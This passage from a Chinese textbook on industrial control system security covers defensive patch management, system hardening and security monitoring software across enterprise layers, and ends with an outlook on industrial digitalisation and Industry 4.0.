(4)确定安装:基于组织机构的风险等级确定补丁安装的时间表。若其风险等级越 高,则早点安排安装该补丁;反之,则可晚一点安装该补丁。 10.4.3 测试阶段 本阶段的目的是为如何测试补丁提供程序性指导。 一般地,补丁测试阶段的流程包括文件证明、安装步骤、合格证与核实、卸载步骤、 风险降低五个步骤,分别介绍如下。 (1)文件证明:经评估阶段评估和确认需要安装的补丁,其文件来源必须是被证明可 信的。通常补丁文件来源于供应商。如果是下载的补丁软件,用户需要核对 checksum 和 文件大小尺寸,以确保该补丁文件没有被修改。同时,用户也需用最近的抗病毒软件对补 丁文件进行扫描,确保补丁文件是安全的。 (2)安装步骤:通常供应商会随补丁文件一起提供补丁安装步骤。用户应认真阅读补 丁安装指令,确定安装补丁的先决条件,以及目标设备和测试样本,并且补丁安装和测试 环境必须与生产环境相同。 (3)合格证与核实:补丁合格证的作用是建立信心和技术有效性,保证补丁不会影响 控制系统的安全和可靠。 (4)卸载步骤:为减少补丁安装后潜在可靠性和操作性风险的发生,用户应准备有效 程序删除安装补丁带来的变化。如果安装补丁后出现系统错误,用户应能保证系统返回未 安装补丁前的配置。 (5)风险降低:系统不兼容、可靠性问题、运行问题、缺少供应商支持或先决条件未 满足等问题通常会引起补丁不能安装的情况。因此,需要准备一些预案,如产品重新配 置、删除受影响的软件等,以便减小因补丁不能安装带来的信息安全风险。 10.4.4 部署阶段 本阶段的目的是为安装部署补丁提供程序性指导。 一般地,补丁部署阶段的流程包括 通知、准备、时间安排、安装部署、核实五个步骤,分别介绍如下。 (1)通知,即通知供应商或用户相关人员。建议由同一批人员完成补丁安装。 (2)准备:根据组织机构的规模和复杂程度,统计设备,确定其物理位置,确定数据 网络是否可用,做好补丁安装准备。 (3)时间安排:补丁文件分发完毕后,接下来是确定时间安排。通常由用户自己确定 在控制系统对生产影响最小的时候进行安装。 (4)安装部署,即实施正确的补丁安装。 (5)核实:补丁安装后,需要核实补丁安装在相应设备、漏洞已解决等。 10.4.5 核实与报告阶段 本阶段的目的是为在补丁安装后进行核实与报告提供程序性指导。 一般地,这个核实 与报告阶段的流程包括系统/设备运行性能监视、漏洞监视、准备报告三个步骤,分别介 绍如下。 (1)系统/设备运行性能监视:在补丁安装后,用户应对系统/设备的运行性能进行必 要的测试,确保补丁安装后系统/设备运行的各项指标均达到要求。 (2)漏洞监视:在补丁安装后,用户应对系统/设备的漏洞进行必要的监测,确保补 丁安装后系统/设备原有的漏洞已解决。 (3)准备报告:补丁安装报告是对系统软件更新的阶段性小结,可以保持系统的可持 续性。同时,也可以提醒相关人员。 10.4.6 设备数据管理阶段 本阶段的目的是为管理设备数据提供程序性指导。 一般地,该设备数据管理阶段的流 程包括设备数据清单更新、系统/设备漏洞通知、控制系统优先级分类管理三个步骤,分 别介绍如下。 (1)设备数据清单更新:用户应及时更新设备数据清单。操作系统采用什么版本、紧 固件采用什么版本、应用软件采用什么版本、补丁安装情况等,都要有最新的记录,以便 掌握控制系统的最新情况。 (2)系统/设备漏洞通知:可以采用一些自动化软件管理系统/设备漏洞情况,可以及 时在设备数据清单中记录发现的漏洞, 一旦供应商发布补丁信息,即可分析是否需要安装 及何时实施安装。 (3)控制系统优先级分类管理:在设备数据清单中可以预先定义优先级,漏洞的影响 也就可以排出优先级,从而指导补丁的安装。 10.5 工业控制系统补丁管理实施 用户建立工业控制系统补丁管理程序,安装部署补丁,随后便进入补丁管理程序的运 行阶段。 建立工业控制系统补丁管理程序是不容易的,如果打补丁的努力能够维持或优化,那 么久而久之通过补丁减少信息安全漏洞的目标就能够实现。 在实施补丁管理时,要注意变更管理、停机时间安排、新设备增加、安全加固等 工作。 10.5.1 变更管理 用户应该把补丁管理纳入公司已有的变更管理程序中,确保所有控制系统的改动已获 得相应的授权、审查和控制。公司的变更管理程序对控制系统管理有很大帮助,如减少未 授权的改动、完善控制系统文档、保持系统修改的一致性、保证可靠性及对系统变动的可 追溯性。 对于控制系统补丁管理,公司的变更管理程序应包括如下几点: (1)补丁管理的工作应在变更控制的范围内,应符合变更管理程序。 (2)培训相关人员,增强意识,充分理解补丁管理符合变更管理程序。 (3)在相关人员进行安装补丁前,任何软件升级、打补丁或软件更新都是变更管理的 一部分,必须经过审核和批准。 (4)比较安装补丁的风险、实施补偿控制或不安装补丁的风险,这个过程应包括信息 安全风险评估。 (5)这个过程应包括控制系统工程设计人员和有信息安全经验的人员。 (6)变更完成后应及时更新控制系统的图纸和文件。 (7)核实变更成功且准确运行。 (8)如对补丁管理的变更管理进行审查,审查记录应明确确定目标设备、测试结果及 安装核实结果。 10.5.2 停机时间安排 接到发布新的漏洞警告通知后,用户应对这些漏洞是否适用于自身的控制系统进行评 估。如果发现系统处于漏洞范围,那么需要采取一些动作,包括在下一个周期进行打补 丁,或者在暂时没有补丁的情况下,或者在有补丁情况下由于控制系统关键而没能打补 丁,这些情况需采取必要的对策。 一般地,打补丁会选择在控制系统处于停机时间,如生产维修阶段、某些行业的大修 期间。需要提醒的是,在控制系统停机前,控制系统的补丁应在非生产环境下进行测试, 减少打补丁时出现问题。 第10章 工业控制系统补丁管理 当然,有些控制系统由于年代久远,没有可适用的补丁,因此需采取相应对策来减少 控制系统受到攻击,直至控制系统升级为止。 10.5.3 新设备增加 随着控制系统的发展,新的设备有可能加入到原有控制系统网络架构中。新设备的加 入意味着新系统的加入,这些新系统由于缺乏最新的安全补丁,必然会对原有系统造成一 定的冲击或损坏。因此,新系统应打好补丁后才可以接入原有的控制系统网络。 新系统除采用安全补丁外,用户还应按照供应商的建议对其加固,如取消一些不必要 的服务、用户账号,激活主机防火墙等。 10.5.4 安全加固 控制系统的安全加固是可以采取的补偿措施,并且能减少安全补丁的需求。 通常,可以采取的控制系统的安全加固包括如下几点,但并不仅限于这几点。 (1)撤除一些不用的物理连接,如不用的串行口、以太网口、无线连接、调制解调 器等。 (2)加强设备的物理保护,避免篡改、连接、乱用、未授权的改动及信息外漏。 (3)删除一些不必要的用户与用户组。 (4)删除一些不必要的软件,停止一些不必要的服务。 (5)加强密码管理,进行定期更换。 (6)管理控制系统访问控制权限。 (7)控制用户账号权限。 (8)停用系统不必要的能力、协议等。 第11章 工业控制系统信息安全 软件与监控 11.1 工业控制系统信息安全软件与监控简介 为了符合工业控制系统信息安全标准要求和产品功能要求,工业控制系统供应商正在 为工业控制系统产品开发信息安全软件,以满足当今主流市场工业用户的迫切需求,从而 达到其产品在市场占主导地位的目的。正如1.2.1 节所述,工业控制系统信息安全早就存 在,只是当时人们并没有意识到,对于工业控制系统信息安全软件,工业控制系统供应商 很早就在为其工控产品开发一些软件补丁、软件更新等。最近,由于工控信息安全事故频 发,工业控制系统供应商也在为其工控产品进行开发一些更好的、更深层次的信息安全软 件,同时为工业用户方便进行工业控制系统运作管理及其信息安全运作管理,工业控制系 统供应商正努力应对并开发出相应的工业控制系统信息安全监控软件。因此,市场上开始 涌现各工业控制系统供应商的信息安全监控软件。 随着网络安全的快速推进,工业控制系统网络安全作为网络安全的重要组成部分,已 经引起人们的高度关注,工业控制系统供应商在这方面也是短板,因此网络信息安全产品 供应商凭借其网络安全专业优势,正快速进入工业控制系统领域,为工业控制系统网络开 发出相应的信息安全产品和信息安全软件。最初,网络信息安全产品供应商为满足工业控 制系统用户信息安全要求,为工业控制系统安装必要的网络隔离设备,为用户配置相应的 监控软件。然后,为扩展工业控制系统整个网络的监控,他们与工业控制系统供应商展开 合作,共同开发,既扩展原网络隔离设备的监控,又整合工业控制系统供应商各个控制网 络设备的部分事件、网络报警记录,使得工业控制系统整个网络的监控成为可能。于是, 网络信息安全产品供应商在此领域展开工作,工业安全监测审计平台、工业安全管控平台 等软件监控逐渐出现,从而满足工业控制系统用户信息安全的要求。 同时我们还应该看到,工业控制系统供应商为工业控制系统产品开发信息安全软件, 网络信息安全产品商为工业控制系统开发网络隔离设备、工业安全监测审计平台、工业安 全管控平台等软件监控,这对于一般的工业控制系统用户信息安全是足够的。然而,随着 工业控制系统用户的快速发展,大型工业控制系统用户也在不断壮大,对于大型厂级的企 业用户或集团公司级的用户来说,需要对各个工厂工业控制系统信息安全进行有效管理, 那么他们如何获取这些信息安全信息呢?为此, 一些专门从事企业资源计划 (ERP) 管理 软件的供应商也开始考虑如何在原有 ERP 软件产品中增加这些工业控制系统信息安全信 息,于是 GRC(Governance Risk and Compliance Management, 企业管控、风险与符合性管理)软件开始走进大众的视野,也就是说,大型厂级、集团级企业用户的工业控制系统 信息安全管理可以纳入GRC 平台。 综上所述,工业控制系统供应商、网络信息安全产品供应商、企业管控软件供应商等 通过相互合作,组成工业控制系统信息安全软件与监控构成图,如图11-1 所示,共同推 进工业控制系统信息安全软件与监控,为工业控制系统用户提供更多的工业控制系统信息 安全管控选择。其中,工业控制系统供应商、网络信息安全产品供应商的软件与监控是必 备配置,而企业管控软件供应商的软件与监控则要视企业自身规模和管理要求选择配置。 企业管控软件供应商 工业控制系统供应商 网络信息安全产品供应商 图11-1 工业控制系统信息安全软件与监控构成图 下面对工业控制系统信息安全软件与监控架构进行介绍,对工业控制系统信息安全软 件与监控进行详细分析,并对其发展趋势进行分析。 11.2 工业控制系统信息安全软件与监控架构 工业控制系统信息安全软件与监控架构按照 ANSI/ISA-99.00.01 企业分层模型,可绘 制出典型工业控制系统信息安全软件与监控架构示意图,如图11-2所示。 如第2章所述,典型的企业生产或制造系统包括现场设备层、现场控制层、过程监控 层、制造执行系统 (MES) 层、企业管理层和外部网络。工业控制系统信息安全软件与监 控需要考虑在现场设备层、现场控制层、过程监控层、制造执行系统 (MES) 层和企业管 理层的部署。从图中可以看出,在现场设备层和现场控制层,工业控制系统供应商需要为 其产品配置相应的工业控制系统信息安全软件与监控;在过程监控层和制造执行系统 (MES) 层,工业控制系统供应商和网络信息安全产品供应商则需要为各自产品配置相应 的工业控制系统信息安全软件与监控;在企业管理层,工业控制系统信息安全软件与监控 则由企业管控软件供应商配置。当然,若企业规模较小,也可以由网络信息安全产品供应 商配置。 外部 网络 对外服务 器群 防火墙 企业 管理层 防火墙 仓储管理 PIMS APC 计划排产 MES 层 历史 数据库 工控安全管控平台 防火墙 监控中心 实时 数据库 OPC 服务器 工程师站 PLC 控制系统 SIS RTU 现场 设备层 现场仪表 现场仪表 现场仪表 图11-2 典型工业控制系统信息安全软件与监控架构示意图 在这个示意图中,每个设备都作为一个端点来考虑,每个网络都必须考虑。因此, 工业控制系统信息安全软件与监控必须考虑所有端点和所有网络。早期,工业控制系统 信息安全软件与监控主要集中在各端点上;近几年,控制网络、信息网络的软件监控也逐 步形成。 11.3 工业控制系统信息安全软件与监控分析 为便于分析工业控制系统信息安全软件与监控,本节按照现场设备层、现场控制层、过程监控层、制造执行系统 (MES) 层、企业管理层的划分,对各层中出现的工业控制系 统信息安全软件与监控进行详细分析。 11.3.1 现场设备层信息安全软件与监控 在现场设备层,需要对总线型现场设备、无线设备和RTU 进行一些信息安全软件配置。 1. 总线型现场设备 总线型现场设备需要按照端点来保护。通常,这种端点保护包括以下两个方面: (1)现场设备补丁软件。 (2)总线访问控制软件。(注:目前还在开发中。) 2. 无线设备 无线设备需要按照端点来保护。通常,这种端点保护包括以下几个方面: (1)无线设备补丁软件。 (2)数据传输加密软件协议 WPA2。 (3)无线通信设备规范要求的软件。 3.RTU RTU 需要按照端点来保护。通常,这种端点保护包括以下几个方面: (1)RTU 补丁软件。 (2)监视、控制与数据采集要求的软件。(注:这点与下面提到的端点保护类似。) 11.3.2 现场控制层信息安全软件与监控 在现场控制层,需要对包括数据采集与监控系统 (SCADA) 、 分散型控制系统 (DCS)、 安全仪表控制系统 (SIS)、 可编程逻辑控制系统的控制器或控制站进行一些信息 安全软件配置。 每个控制器或控制站均需要按照端点来保护。通常,这种端点保护包括以下几个方面。 (1)补丁软件。 正如第10 章提到的,工业控制系统供应商应提供合格的相关补丁,包括产品用到的 操作系统制造商和工业控制系统应用软件的安全补丁。 (2)风暴保护。 对于控制器和通信模块来说, 一旦出现网络风暴,就可以通过网络过滤,阻止不支持 的流量并保护各控制节点。 11.3.3 过程监控层信息安全软件与监控 在过程监控层,需要对包括数据采集与监控系统(SCADA) 、 分散型控制系统 (DCS)、 安全仪表控制系统 (SIS)、 可编程逻辑控制系统的工程师站、操作员站、OPC 服务器、实时数据库、监控中心等进行信息安全软件与监控配置,可分为各端点保护和工控 安全监测与审计平台。 1. 各端点保护 工程师站、操作员站、 OPC 服务器等均需要按照端点来保护。通常,这种端点保护 包括以下三个方面软件。 1)内置型软件 (1)补丁和防病毒软件。 正 如 第 1 0 章提到的,工业控制系统供应商应提供合格的相关补丁,包括产品用到的 操作系统制造商和工业控制系统应用软件的安全补丁,对此层各端点也是适用的。 防病毒软件进行定时查毒和杀毒,发挥入侵检测和预防作用,确保各端点的安全。目 前常见的防病毒软件有 McAfee 、Symantec 等。 (2)访问与账户管理软件。 访问与账户管理通常采用基于用户、角色、位置的访问与账户管理,也可以基于对象 和属性等级进行访问与账户管理。 (3)主机型防火墙软件。 正如第3 . 1 节所述,基于主机的防火墙技术是部署在工作站或控制器的软件解决方 案,用于控制进出特定设备的流量。 (4)备份与恢复软件。 通过有效的灾难性恢复,避免由于事故导致系统数据和应用数据的大量丢失。同时, 通过系统管理特点,可选择全部备份与恢复、部分备份与恢复。 2)基本型软件 (1)审计跟踪软件。 审计跟踪是对系统活动的流水记录。该记录按事件从始至终的途径,顺序检查审计跟 踪记录、审查和检验每个事件的环境及活动。审计跟踪通过日志方式提供应负责任人员的 活动证据以支持职能的实现。审计跟踪记录系统活动和用户活动。系统活动包括操作系统 和应用程序进程的活动;用户活动包括用户在操作系统和应用程序中的活动。通过借助适 当的工具和规程,审计跟踪可以发现违反安全策略的活动、影响运行效率的问题及程序中 的错误。 通常,审计日志包含操作的时间与日期、操作的节点、操作的用户名称、操作的类 型、受操作影响的对象和属性及涉及系统的其他信息等。 (2)工作站、网络的监控软件。 工作站、网络设备的正确运行直接影响控制系统的运行和可靠性,通过连续监控这些 设备,可以主动发现一些异常行为,优化系统的可用性。 (3)移动介质和设备的信息安全软件。 移动介质和设备的使用直接影响系统的安全。通过扫描和监控这些移动介质和设备, 可以主动阻止其对系统的攻击。 3)增强型软件 (1)数字签名软件。 系统可以将一些配置信息、报表或控制运用定义为某个用户签名,从而保证这些信息 不会轻易被修改。 (2)白名单软件。 通过白名单策略,在用户端和服务器端阻止未经批准的软件运行。 (3)高级访问控制软件。 为方便后期的维修支持,提供高级访问控制,实现安全远程访问。 2. 工控安全监测与审计平台 工控安全监测与审计平台是一款专门针对工业控制系统的审计和威胁监测平台。其主 要功能包括: (1)监测针对工业控制协议的网络攻击、工控协议畸形报文、用户异常操作、非法设 备接入及蠕虫、病毒等恶意软件的传播,并实时报警。 (2)支持对工控系统通信记录的追溯,便于后续的事故调查。 (3)与工业控制系统供应商进行整合,提取其设备运行日志信息。 工控安全监测与审计平台与下面讲到的管控平台是独立运作且信息共享的关系。 一方 面,监测与审计平台为管控平台提供日志及分析数据,助其更好地监管全网系统与安全设 备。另一方面,管控平台也为监测与审计平台更好地运行提供监控助力,保证其运行稳 定、数据真实可信。 工控安全监测与审计平台已开始出现并投入使用。其典型的工控安全监测与审计平台 信息示意图如图11-3所示。 图11-3 典型的工控安全监测与审计平台信息示意图 11.3.4 制造执行系统层信息安全软件与监控 在制造执行系统 (MES) 层需要对包括工厂信息管理系统、先进控制系统、历史数据 库、计划排产、仓储管理等进行信息安全软件与监控配置,通常可分为各端点保护和工业 安全管控平台。 1. 各端点保护 服务器等均需要按照端点来保护。通常,这种端点保护软件与第11.3.3节提到的各端 点保护软件类似,在此不再展开分析。 2. 工业安全管控平台 工业安全管控平台是一种对工业控制生产网和管理网中部署的系统及工控安全设备进 行监控、配置和运维的产品,主要通过行为审计、事件追踪、日志管理和安全域管理等功 能,感知和分析网络中的安全风险态势,提升网络安全事件的预判能力,以便于及时遏制 可能的威胁。 其主要功能有: (1)统一 的安全设备及信息资产管理。 (2)全网网络及安全设备态势监视、整体安全感知。 (3)闭环流程的事件处理管控。 工业安全管控平台已开始出现并投入使用,其典型的工业安全管控平台示意图如 图11-4和图11-5所示。 图11-4 典型的工业安全管控平台示意图1 图11-5 典型的工业安全管控平台示意图2 11.3.5 企业管理层信息安全软件与监控 在企业管理层,需要对财务管理、销售管理、人事管理、供应链管理等进行信息安全 软件与监控配置,这些均需信息技术部门负责。工业安全管控平台对于一般的工业控制系 统用户来说信息安全是足够的,而大型厂级、集团级企业用户的工业控制系统信息安全管 理可以接入 GRC 平台。因此,在这层的信息安全软件与监控配置, 一般可分为工业安全 管控平台和 GRC 平台。 1.工业安全管控平台 通常,这种工业安全管控平台软件与第11.3.4节提到的工业安全管控平台软件相同, 在此不再展开分析。 2.GRC 平台 GRC(Governance Risk and Compliance Management) 的概念在国内才刚刚兴起,但 其在国外已经发展相当长时间。GRC 以美国安然、法国兴业银行等一系列反面教材为出 发点,以《萨班斯法案》(Sarbanes-Oxley Act, 简称 SOX 法案)为源泉,并贯穿到企业治 理、风险管理和合规经营等各方面。随着企业的发展,以整体管控、战略执行为目标,实 现企业管控、风险规避、战略绩效、业务流程管理及包括质量、安全、环境等在内的各种 符合性管理,服务于管理层和决策层的 GRC 系统被认为是企业在日益复杂的竞争环境下 赖以生存和发展的必然和有效选择。 中国经济快速增长带动中国企业不断做大、做强,并迈出国门,但在扩张并走向世 界的过程中,中国企业逐渐暴露出“低效率低绩效、管控能力薄弱、不合规不透明”等 诸多问题,不少企业也因此遭受了重大损失; GRC 正是很好解决这些问题的管理方法与 工具。 GRC 的完整定义 GRC 是在企业的各经营业务上,以战略为中心,以流程管理为基础,通过绩效管理 和风险内控管理措施,对各项经营过程进行管理和控制,保障战略和经营目标达成的管理 方法和工具的总称,其涉及以下三个组成部分。 (1)Governance (治理/管控):建立完整的制度安排和治理框架,公平对待各利益相 关者,制定公司战略目标和政策,监督绩效,遵从法律及制度规定,透明和披露经营状 况,对各项经营过程本身进一步进行管理和监督。 (2)Risk Management (风险管理):对所有业务和法规风险进行结构化的识别、评 估、缓解、监视和控制。 (3)Compliance Management (符合性管理):通过内部控制管理机制和体系,确保各 项制度和法规得以遵从,政策得以贯彻,各项经营和管理目标得以有效达成。 2)GRC 的治理模型 GRC 的主要目的是保障基于企业管控和治理的战略执行,企业治理是一个结果,更 是一个手段,而以业务运营为基础,注重业务执行与监控,关注防范风险与合规,并引入 绩效考核的企业管控闭环(如图11-6所示)保证了企业管控的有效性,也保证了企业治 理的持续性。 图11-6 企业管控闭环模型图(信息来源:北京慧点科技有限公司网页) 3)GRC 与工业控制系统信息安全 对于快速崛起与发展的中国企业来说, GRC 是用于改善企业做强、做大过程中所面 对突出管理问题(如经营绩效、集团管控、合规透明)的方法体系和工具集合。 GRC 软件是一个集成化的解决方案,其大致可以包含决策支持(集团管控、董事会 治理、领导交办、领导驾驶舱、办公平台、决策系统等)、战略绩效管理(业务战略体 系、全面预算管理、平衡计分卡、战略监控、战略报告、绩效管理、人力资源管理、报告 管理等)、流程管理(业务流程管理、流程绩效、工作任务管理、协同管理等)、风险管 理(审计管理、合同管理、安全管理、质量管理等)、合规管理 (SOX 合规、行业合规、 内控系统等)、信息安全管理(信息安全合规、信息安全风险管理、访问控制管理、信息 安全服务、安全与目录管理、策略管理等)及展现(门户、与其他业务系统的集成等)等 几大类。通常, GRC 的集合视图如图11-7所示。 图11-7 GRC 的集合视图(信息来源:北京慧点科技有限公司网页) 工业控制系统信息安全作为信息安全管理的重要组成部分,基于定义商业影响、理解 常规和运作风险、流程化处理等方面考虑,在 GRC 平台信息安全管理模块中,提供了以 下解决方案: (1)建立信息安全策略和标准。 (2)检测和响应攻击。 (3)识别和更正信息安全缺陷。 (4)执行风险评估和监控。 通过以上解决方案,实现降低整个信息安全的风险,尽可能降低由信息安全事件和符 合性带来的成本开销,以及精简识别、测量和监控信息安全流程。 一般地,GRC 平台中关于信息安全管理的主要内容包括以下几点: (1)信息安全问题管理。 (2)信息安全与策略程序管理。 (3)信息安全常规管理。 (4)信息安全控制保障。 (5)信息安全漏洞程序。 (6)信息安全事件管理。 (7)信息安全运作与违规管理。 (8)信息安全风险管理。 ( 9 ) 外 设 部 件 互 连 (PCI) 管 理 。 GRC 平台中信息安全管理的监控画面有多种,取决于用户信息安全管理的需求。GRC- 信息安全风险管理示意图如图11-8所示。 图11-8 GRC-信息安全风险管理示意图 4)GRC 产品供应商 (1)国外 GRC 服务厂商及解决方案。 国 外 GRC 市场中处于引领地位的主要有 Axentis 、BWise 、MetricStream、 OpenPages 、Thomson Reuters 、Oracle 等。这些 GRC 厂商通过持续更新,提升 GRC 理念 和技术产品水平,赢得了越来越广泛的市场和越来越庞大的客户群体;这些厂商不仅在其 技术实力方面占有绝对领先地位,而且通过理念研究和战略指导等也正在塑造其 GRC 领 导者的角色。 国外 GRC 市场中紧随其后开始向引领地位冲击的主要有 Archer 、Cura 、Mega、 Methodware 、Protiviti 、Strategic Thought 等。在过去两年,这些厂商的 GRC 理念与产品 取得大幅改善,他们逐渐向世界领先企业提供 GRC 各个领域的优秀解决方案和产品;虽 然理念水平、技术平台及市场占有率等还没有达到领导者的地位,但他们仍然会在繁杂的 GRC市场中继续保持强劲的竞争地位。 国外 GRC 市场中还有 SAI Global 、SAP 、Trintech 、Aline 、IDS Scheer 、CA、 Compliance 360 、DoubleCheck 、Neohapsis 、List Group 、Optial 、Sword Achiever、 Trintech 、Xactium 等参与者。这些厂商对于 GRC 理念的研究大多基于自己原有解决方 案,GRC 产品也限定在与其本身产品线相关的某 GRC 领域。虽然目前他们的解决方案还 不够全面,市场份额还不够高,但其长期积累的客户群体和强大的技术实力将帮助他们在GRC市场中快速成长。 ( 2 ) 国 内GRC 服务厂商及解决方案。 国内对于 GRC 理论和实践的研究相对较晚,相关厂商的管理经验和客户积累与国外 也存在一 定差距,所以国内GRC 软件提供商的 GRC 解决方案大多基于原有解决方案的扩 展,而很少形成涉及GRC 领域全方位的解决方案集合。目前国内提供GRC 领域服务的厂 商主要有慧点科技、用友、博科资讯、炎黄盈动、第一会达等。 11.4 工业控制系统信息安全软件与监控趋势 工业控制系统信息安全已然引起工业控制系统用户的密切关注,工业控制系统信息安 全软件与监控是工业控制系统信息安全必不可少的环节。在工业现代化快速发展的今天, 工业控制系统信息安全软件与监控显得尤为重要,工业控制系统供应商、网络信息安全产 品供应商、企业管控软件供应商、工业控制系统用户都必须认真对待工业控制系统信息安 全软件与监控。 从工业控制系统市场发展和市场出现的来自不同工业控制系统信息安全软件与监控来 看,工业控制系统信息安全软件与监控产品正逐步走向规范化、集成化和产品更完善的大 趋势。 11.4.1 信息安全软件与监控规范化 工业控制系统信息安全事件的频繁发生及其导致的严重后果,必然引起各国政府和相 关工业控制系统用户的高度重视,如何有效推进工业控制系统信息安全,加强管理工业控 制系统信息安全,其软件与监控产品是大势所趋。因此,其软件与监控产品必将出现规范 化要求。 正如前面所述,工业控制系统供应商、网络信息安全产品供应商和企业管控软件供应 商都在努力开发这些工业控制系统信息安全软件与监控产品,目前市场上出现的软件与监 控产品种类繁多,对于工业控制系统用户而言,正确选择配置其工业控制系统信息安全软 件与监控产品,必将提出其软件与监控产品规范化的要求。因此,工业控制系统信息安全 软件与监控产品规范化是必然的大趋势。 11.4.2 信息安全软件与监控集成化 由于工业控制系统中的产品和网络多种多样,工业控制系统供应商会为其工控产品开 发自身设备的软件与监控,网络信息安全产品供应商会为其网络产品开发自身设备的软 件与监控,所以工控产品和网络产品信息安全软件与监控只有做好集成,才可以统 一集 成至企业管控软件供应商的监控平台。因此,工业控制系统信息安全软件与监控必须集成设计。 另外,工业控制系统信息安全软件与监控是由工业控制系统供应商、网络信息安全产 品供应商和企业管控软件供应商各自开发设计的,如何将这些软件与监控整合在一起,是 对工业控制系统信息安全有效管理提出的要求,也是工业控制系统用户对此提出的要求。 11.4.3 信息安全软件与监控更完善 从前面几节的介绍可以看出,目前出现的工业控制系统信息安全软件与监控还在起步 阶段,随着工业控制系统信息安全技术的深入开发,其软件与监控将走向更完善。 (1)信息安全技术软件更完善。 正如第3章所述,工业控制系统信息安全技术有很多种,目前市场上出现的工业控制 系统信息安全技术软件还是比较有限的。因此,工业控制系统信息安全软件将有待于进一 步推进和完善。 (2)信息安全监控更完善。 目前,工业控制系统信息安全监控市场纷繁复杂,需要工业控制系统供应商、网络信 息安全产品供应商和企业管控软件供应商各自开发并兼容设计,努力建立一个统一的信息 安全监控,为工业控制系统用户节约时间、人力和物力,实现工业控制系统信息安全的集 中监控。因此,工业控制系统信息安全监控需要工业控制系统供应商、网络信息安全产品 供应商和企业管控软件供应商通力合作,并不断走向完善。 第 1 2 章 未 来 展 望 12.1 工业发展趋势 工业领域中全球竞争越来越激烈,自从十多年前首次推出智能电网的概念以来,以智 能制造和信息化管理为主导的新工业革命正在兴起。 当我们在寻找“智能”的奥秘时,科技革命、产业革命、工业革命的呼声越来越高, 杰里米 · 里夫金预言“第三次工业革命”,德国推出的“工业4 .0”现在被许多同行称为 “第四次工业革命”,欧盟则提出“新工业革命”。 工业数字化、工业智能化和工业信息化成为工业领域的高频词,是构成未来工业体系 的关键特征和发展趋势。工业自动化和数字化是工业智能化的前提,包括控制系统的数字 化、工业网络的数字化、测量和执行手段的数字化,也就是工业自动化所有环节的全面数 字化。在智能工厂里,人、机器和资源如同在一个社交网络里一样自然地相互沟通协作; 生产出来的智能产品能够理解自己被制造的细节,以及将如何使用。在智能工厂里,智能 辅助系统将从执行例行任务中解放出来,使它们能够专注于创新、增值的活动;灵活的工 作组织能够帮助工人把生活和工作更好地结合,个体顾客的需求将得到满足。工业信息化 是现代企业与生产管理的必然要求,是工业数字化、工业智能化的完美体现。 12.1.1 工业数字化 工厂数字化,也就是数字化工厂,如何完整而精确地描述是多年来工程技术界一直在 探索的课题。按工艺流程划分,存在流程工业和离散制造业的生产工厂,不同行业的数字 化工厂需要建立不同的模型,采用不同的方法,寻找和开发适当的描述工具。另外,不同 专业的人从各自工作的需要出发,开发研究数字化工厂的描述方法和实施工具,大致分为 以下三类:以制造为中心的数字化工厂的方法和工具;以设计为中心的数字化工厂的方法 和工具;以管理为中心的数字化工厂的方法和工具。 工厂数字化,是工厂利用数字化技术,集成产品设计、制造工艺、生产管理、企业管 理、销售和供应链等各方面人员的知识、智慧和经验,进行产品设计、生产、管理、销售、 服务的现代化工厂模式。这种模式特别依赖于网络技术(如互联网技术、物联网技术),实 时获取工厂内、外的相关数据和信息,有效优化生产组织的全部活动,从而达到生产效率、 物流运转效率、资源利用效率最高,对环境影响最小,充分发挥从业人员能动性的结果。 2006 年,国际著名咨询机构 ARC 总结了以制造为中心的数字制造、以设计为中心的 数字制造和以管理为中心的数字制造,并考虑了原材料、能源供应和产品的销售供应,提 出用工程技术、生产制造和供应链三个维度来描述工厂的全部功能和活动,如图12-1 所示 。 通过建立描述这三个维度的信息模型,利用适当的软件就能够完整表达围绕产品设 计、技术支持、生产制造,以及原材料供应、销售和与市场相关的所有环节的功能和活 动。如果这些描述和表达能够得到实时数据的支持,还能够实时下达指令指导这些活动, 并且为实现全面优化能在这三个维度之间进行交互,可以肯定地说,这就是我们理想的数 字化工厂,在此基础上能在市场营销方面、能源优化利用等方面引入智能商务和智能能源 管理。因此,工业数字化,实现了产品的数字化设计、产品的数字化制造、经营业务过程 和制造过程的数字化管理,以及综合集成优化的过程。 图12-1 数字化工厂模型用三个维度表达图 12.1.2 工业智能化 工业智能化,通俗地理解,就是生产、制造人机一体化。今后的制造系统将不再是单 单由人主宰设备,而是机器具有自适应能力,满足甚至超出人们的愿望。智能工厂、智能 生产、数字工厂、智慧工厂、信息物理系统 (Cyber Physical System,CPS) 等新的名称和 概念,预示着工业智能化的发展趋势。 下面将回顾工业发展,分析工业发展的瓶颈和解决办法,从而找出工业智能化的关键 技术。 1. 工业发展回顾 按照目前同行比较接受的观点,工业发展经历了四次工业革命。以德国对生产制造业 的发展回顾为例,工业革命的划分如图12-2所示,下面对四次工业革命进行介绍。 第一次工业革命大约发生于1780 年,18 世纪中期英国发明了“蒸汽机”,随之创造 出制造蒸汽机的生产工具,如手动工具、刀具等。1784 年,第一台机械纺织机诞生,人 类由“手工劳动”向“机械化”转变,由“家庭手工业”向“大机械工业生产方式”转 变,劳动生产率大幅度提高,人类的生存率也大幅度提高,推动了世界由“农业国”向 “工业国”转变。 第二次工业革命产生于20 世纪初,当时美国的福特发明了汽车与大批量生产流水 线,同时电力技术开始推广应用,随之而来创造出“自动化机床”、“自动化生产线”。人 类由 “ 机械化零星生产 ” 向 “ 大批量自动化生产 ” 转变 , 提高了劳动生产率 , 加速了现代化工业的发展。 在 2 0 世纪70年代初,第 一 台可编程逻辑控制器 (PLC)Modicon084 问世,在微电 子、微型计算机与 IT 技术的推动下,产生了第三次工业革命。特别是进入20 世 纪 8 0 年 代,发达国家经过几十年大工业生产的积累,为了适应人们日益多样化的需求,综合运用 现代管理技术、制造技术、信息技术、自动化技术、系统工程技术及计算机软硬件,形成 了计算机集成制造 (CIM) 技术,实现了企业全部生产系统和企业内部业务的综合自动化 及高效化,使企业经济效益持续稳步增长。 由于数字化、智能化、信息化与网络化等新技术不断取得突破,催生了第四次工业革 命的到来。在这个时代,每个工厂企业都将建立“数字企业平台”,通过开放接口将虚拟环 境与基础架构融为一体,从而构成信息物理融合生产系统 (CPS), 生产自动化系统将升级 为信息物理融合生产系统 (CPPS) 。 工业将由集中式控制向分散式、增强型控制基本模式转 变,创造新价值的过程正在发生改变,产业链分工将被重组,使人类从“自动化生产”进 入“智能化生产、绿色生产、都市化 (Urban) 生产”。 从工业1.0到工业4.0 复杂程度 图12-2 工业革命划分图 从四次工业革命分析可见,科技的发展必然会进入工业界,而会对工业产生最大影响 